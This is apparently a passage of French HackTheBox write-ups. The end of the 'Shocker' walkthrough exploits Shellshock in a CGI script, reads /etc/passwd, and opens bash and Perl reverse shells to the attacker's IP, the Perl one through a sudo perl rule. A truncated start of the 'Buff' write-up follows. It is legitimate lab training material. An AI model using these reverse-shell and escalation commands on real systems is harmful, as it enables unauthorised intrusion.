class="cl"><span class="o">[</span>!<span class="o">]</span> Keyboard interrupt detected, terminating. </span></span><span class="line"><span class="cl">Progress: <span class="m">11293</span> / <span class="m">882244</span> <span class="o">(</span>1.28%<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span><span class="line"><span class="cl"><span class="nv">Finished</span> </span></span><span class="line"><span class="cl"><span class="o">===============================================================</span> </span></span></code></pre></td></tr></table> </div> </div><p>Bingo ! On trouve un script user.sh.</p> <h2 id="foothold">Foothold </h2><h3 id="shellshock">Shellshock </h3><p>Grâce au nom de la machine &ldquo;shocker&rdquo; et quelques recherches sur le web, on trouve la vulnérabilité &ldquo;shellshock&rdquo; qui permet d&rsquo;executer du code arbitraire grâce aux fichiers présents dans le dossier <strong>cgi-bin</strong>. On trouve un github permettant de l&rsquo;exploiter:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python2 shocker.py --Host<span class="o">=</span>shocker.htb --cgi /cgi-bin/user.sh --command whoami </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> .-. . . </span></span><span class="line"><span class="cl"> <span class="o">(</span> <span class="o">)</span><span class="p">|</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="sb">`</span>-. <span class="p">|</span>--. .-. .-.<span class="p">|</span>.-. .-. .--. </span></span><span class="line"><span class="cl"> <span class="o">(</span> <span class="o">)</span><span class="p">|</span> <span class="p">|</span><span class="o">(</span> <span class="o">)(</span> <span class="p">|</span>-.<span class="s1">&#39;(.-&#39;</span> <span class="p">|</span> </span></span><span class="line"><span class="cl"> <span class="sb">`</span>-<span class="s1">&#39; &#39;</span> <span class="sb">`</span>-<span class="sb">`</span>-<span class="s1">&#39; `-&#39;&#39; `-`--&#39;&#39; v1.1 </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> Tom Watson, tom.watson@nccgroup.trust </span></span></span><span class="line"><span class="cl"><span class="s1"> https://www.github.com/nccgroup/shocker </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> Released under the GNU Affero General Public License </span></span></span><span class="line"><span class="cl"><span class="s1"> (https://www.gnu.org/licenses/agpl-3.0.html) </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1"> </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Single target &#39;</span>/cgi-bin/user.sh<span class="s1">&#39; being used </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Checking connectivity with target... </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Target was reachable </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Looking for vulnerabilities on shocker.htb:80 </span></span></span><span class="line"><span class="cl"><span class="s1">[+] 1 potential target found, attempting exploits </span></span></span><span class="line"><span class="cl"><span class="s1">[+] The following URLs appear to be exploitable: </span></span></span><span class="line"><span class="cl"><span class="s1"> [1] http://shocker.htb:80/cgi-bin/user.sh </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Would you like to exploit further? </span></span></span><span class="line"><span class="cl"><span class="s1">[&gt;] Enter an URL number or 0 to exit: ls </span></span></span><span class="line"><span class="cl"><span class="s1">[+] The following URLs appear to be exploitable: </span></span></span><span class="line"><span class="cl"><span class="s1"> [1] http://shocker.htb:80/cgi-bin/user.sh </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Would you like to exploit further? </span></span></span><span class="line"><span class="cl"><span class="s1">[&gt;] Enter an URL number or 0 to exit: 1 </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Entering interactive mode for http://shocker.htb:80/cgi-bin/user.sh </span></span></span><span class="line"><span class="cl"><span class="s1">[+] Enter commands (e.g. /bin/cat /etc/passwd) or &#39;</span>quit<span class="err">&#39;</span> </span></span><span class="line"><span class="cl"> &gt; whoami </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; id </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; /bin/id </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; /bin/cat /etc/passwd </span></span><span class="line"><span class="cl"> &lt; root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl"> &lt; daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; bin:x:2:2:bin:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; sys:x:3:3:sys:/dev:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; sync:x:4:65534:sync:/bin:/bin/sync </span></span><span class="line"><span class="cl"> &lt; games:x:5:60:games:/usr/games:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; man:x:6:12:man:/var/cache/man:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; mail:x:8:8:mail:/var/mail:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; news:x:9:9:news:/var/spool/news:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; proxy:x:13:13:proxy:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; backup:x:34:34:backup:/var/backups:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; gnats:x:41:41:Gnats Bug-Reporting System <span class="o">(</span>admin<span class="o">)</span>:/var/lib/gnats:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false </span></span><span class="line"><span class="cl"> &lt; systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false </span></span><span class="line"><span class="cl"> &lt; systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false </span></span><span class="line"><span class="cl"> &lt; systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false </span></span><span class="line"><span class="cl"> &lt; syslog:x:104:108::/home/syslog:/bin/false </span></span><span class="line"><span class="cl"> &lt; _apt:x:105:65534::/nonexistent:/bin/false </span></span><span class="line"><span class="cl"> &lt; lxd:x:106:65534::/var/lib/lxd/:/bin/false </span></span><span class="line"><span class="cl"> &lt; messagebus:x:107:111::/var/run/dbus:/bin/false </span></span><span class="line"><span class="cl"> &lt; uuidd:x:108:112::/run/uuidd:/bin/false </span></span><span class="line"><span class="cl"> &lt; dnsmasq:x:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false </span></span><span class="line"><span class="cl"> &lt; sshd:x:110:65534::/var/run/sshd:/usr/sbin/nologin </span></span><span class="line"><span class="cl"> &lt; shelly:x:1000:1000:shelly,,,:/home/shelly:/bin/bash </span></span><span class="line"><span class="cl"> &gt; sh -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.42/6666 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; sh -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.42/6666 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; python3 --version </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; python3 --version &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.42/6666 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; python3 --version &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.42/6666 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; nc 10.10.14.42 <span class="m">6666</span> -e sh </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; locate nc </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; /bin/cat /home/*/user.txt </span></span><span class="line"><span class="cl"> &lt; c4bf.....3bf6 </span></span><span class="line"><span class="cl"> &gt; </span></span></code></pre></td></tr></table> </div> </div><h3 id="shell-as-shelly">Shell as shelly </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">.... </span></span><span class="line"><span class="cl"> &gt; /bin/bash -i &gt;<span class="p">&amp;</span> /dev/tcp/10.10.14.42/6666 0&gt;<span class="p">&amp;</span><span class="m">1</span> </span></span><span class="line"><span class="cl"> &gt; No response </span></span><span class="line"><span class="cl"> &gt; </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">-------------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">6666</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">6666</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.56<span class="o">]</span> <span class="m">40886</span> </span></span><span class="line"><span class="cl">bash: no job control in this shell </span></span><span class="line"><span class="cl">shelly@Shocker:/usr/lib/cgi-bin$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">shelly </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-1">Enumeration </h3><p>On peut executer n&rsquo;importe quel script perl en tant que root&hellip; J&rsquo;ai donc récupérer un reverse shell en perl et je l&rsquo;ai executé.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">shelly@Shocker:/tmp$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> shelly on Shocker: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User shelly may run the following commands on Shocker: </span></span><span class="line"><span class="cl"> <span class="o">(</span>root<span class="o">)</span> NOPASSWD: /usr/bin/perl </span></span></code></pre></td></tr></table> </div> </div><h3 id="perl-as-root">Perl as root </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">shelly@Shocker:/tmp$ cat root.pl </span></span><span class="line"><span class="cl">use Socket<span class="p">;</span><span class="nv">$i</span><span class="o">=</span><span class="s2">&#34;10.10.14.42&#34;</span><span class="p">;</span><span class="nv">$p</span><span class="o">=</span>1337<span class="p">;</span>socket<span class="o">(</span>S,PF_INET,SOCK_STREAM,getprotobyname<span class="o">(</span><span class="s2">&#34;tcp&#34;</span><span class="o">))</span><span class="p">;</span><span class="k">if</span><span class="o">(</span>connect<span class="o">(</span>S,sockaddr_in<span class="o">(</span><span class="nv">$p</span>,inet_aton<span class="o">(</span><span class="nv">$i</span><span class="o">)))){</span>open<span class="o">(</span>STDIN,<span class="s2">&#34;&gt;&amp;S&#34;</span><span class="o">)</span><span class="p">;</span>open<span class="o">(</span>STDOUT,<span class="s2">&#34;&gt;&amp;S&#34;</span><span class="o">)</span><span class="p">;</span>open<span class="o">(</span>STDERR,<span class="s2">&#34;&gt;&amp;S&#34;</span><span class="o">)</span><span class="p">;</span>exec<span class="o">(</span><span class="s2">&#34;sh -i&#34;</span><span class="o">)</span><span class="p">;</span><span class="o">}</span><span class="p">;</span> </span></span><span class="line"><span class="cl">shelly@Shocker:/tmp$ sudo /usr/bin/perl root.pl </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">$ nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">1337</span> ... </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.42<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.10.56<span class="o">]</span> <span class="m">59474</span> </span></span><span class="line"><span class="cl"><span class="c1">## whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1">## python3 -c &#34;import pty;pty.spawn(&#39;/bin/bash&#39;)&#34;</span> </span></span><span class="line"><span class="cl">root@Shocker:/tmp# <span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl"><span class="nb">export</span> <span class="nv">TERM</span><span class="o">=</span>xterm </span></span><span class="line"><span class="cl">root@Shocker:/tmp# ^Z </span></span><span class="line"><span class="cl">zsh: suspended nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/shocker/shocker<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ stty raw -echo<span class="p">;</span> <span class="nb">fg</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>1<span class="o">]</span> + continued nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">root@Shocker:/tmp# </span></span><span class="line"><span class="cl">root@Shocker:/tmp# whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl">root@Shocker:/tmp# <span class="nb">cd</span> /root </span></span><span class="line"><span class="cl">root@Shocker:~# ls </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">root@Shocker:~# cat root.txt </span></span><span class="line"><span class="cl">adcd.....c16c </span></span></code></pre></td></tr></table> </div> </div><h2 id="bonus">Bonus </h2><h3 id="enumeration-shellshock-vuln-with-nmap-script">Enumeration shellshock vuln with nmap script </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/shocker<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ locate nse <span class="p">|</span> grep shellshock </span></span><span class="line"><span class="cl">/usr/share/nmap/scripts/http-shellshock.nse </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/shocker<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ cat /usr/share/nmap/scripts/http-shellshock.nse <span class="p">|</span> grep nmap </span></span><span class="line"><span class="cl">-- nmap -sV -p- --script http-shellshock &lt;target&gt; </span></span><span class="line"><span class="cl">-- nmap -sV -p- --script http-shellshock --script-args <span class="nv">uri</span><span class="o">=</span>/cgi-bin/bin,cmd<span class="o">=</span>ls &lt;target&gt; </span></span><span class="line"><span class="cl"><span class="nv">license</span> <span class="o">=</span> <span class="s2">&#34;Same as Nmap--See https://nmap.org/book/man-legal.html&#34;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/htb/shocker<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ nmap -sV -p80 --script http-shellshock --script-args <span class="nv">uri</span><span class="o">=</span>/cgi-bin/user.sh,cmd<span class="o">=</span>ls shocker.htb </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2025-01-13 08:33 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> shocker.htb <span class="o">(</span>10.10.10.56<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.019s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">80/tcp open http Apache httpd 2.4.18 <span class="o">((</span>Ubuntu<span class="o">))</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-shellshock: </span></span><span class="line"><span class="cl"><span class="p">|</span> VULNERABLE: </span></span><span class="line"><span class="cl"><span class="p">|</span> HTTP Shellshock vulnerability </span></span><span class="line"><span class="cl"><span class="p">|</span> State: VULNERABLE <span class="o">(</span>Exploitable<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> IDs: CVE:CVE-2014-6271 </span></span><span class="line"><span class="cl"><span class="p">|</span> This web application might be affected by the vulnerability known </span></span><span class="line"><span class="cl"><span class="p">|</span> as Shellshock. It seems the server is executing commands injected </span></span><span class="line"><span class="cl"><span class="p">|</span> via malicious HTTP headers. </span></span><span class="line"><span class="cl"><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> Disclosure date: 2014-09-24 </span></span><span class="line"><span class="cl"><span class="p">|</span> Exploit results: </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;!DOCTYPE HTML PUBLIC <span class="s2">&#34;-//IETF//DTD HTML 2.0//EN&#34;</span>&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;html&gt;&lt;head&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;title&gt;500 Internal Server Error&lt;/title&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;/head&gt;&lt;body&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;h1&gt;Internal Server Error&lt;/h1&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;p&gt;The server encountered an internal error or </span></span><span class="line"><span class="cl"><span class="p">|</span> misconfiguration and was unable to <span class="nb">complete</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> your request.&lt;/p&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;p&gt;Please contact the server administrator at </span></span><span class="line"><span class="cl"><span class="p">|</span> webmaster@localhost to inform them of the <span class="nb">time</span> this error occurred, </span></span><span class="line"><span class="cl"><span class="p">|</span> and the actions you performed just before this error.&lt;/p&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;p&gt;More information about this error may be available </span></span><span class="line"><span class="cl"><span class="p">|</span> in the server error log.&lt;/p&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;hr&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;address&gt;Apache/2.4.18 <span class="o">(</span>Ubuntu<span class="o">)</span> Server at shocker.htb Port 80&lt;/address&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> &lt;/body&gt;&lt;/html&gt; </span></span><span class="line"><span class="cl"><span class="p">|</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> References: </span></span><span class="line"><span class="cl"><span class="p">|</span> https://cve.mitre.org/cgi-bin/cvename.cgi?name<span class="o">=</span>CVE-2014-7169 </span></span><span class="line"><span class="cl"><span class="p">|</span> http://seclists.org/oss-sec/2014/q3/685 </span></span><span class="line"><span class="cl"><span class="p">|</span> https://cve.mitre.org/cgi-bin/cvename.cgi?name<span class="o">=</span>CVE-2014-6271 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ http://www.openwall.com/lists/oss-security/2014/09/24/10 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 6.77 seconds </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/p/buff-htb/Sun, 12 Jan 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/buff-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Buff cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Buff</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.10.198</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Easy</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="ip">IP </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">10.10.10.198 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sS -sV -An -p- -vvv -T4 10.10.10.198 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">7680/tcp open pando-pub? syn-ack ttl <span class="m">127</span> </span></span><span class="line"><span class="cl">8080/tcp open http syn-ack ttl <span class="m">127</span> Apache httpd 2.4.43 <span class="o">((</span>Win64<span class="o">)</span> OpenSSL/1.1.1g PHP/7.4.6<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-open-proxy: Potentially OPEN proxy. </span></span><span class="line"><span class="cl"><span class="p">|</span>_Methods supported:CONNECTION </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: mrb3n<span class="err">&#39;</span>s Bro Hut </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Apache/2.4.43 <span class="o">(</span>Win64<span class="o">)</span> OpenSSL/1.1.1g PHP/7.4.6 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="directory-enumeration--buffhtb---port-8080">Directory enumeration : buff.htb - port 8080 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span 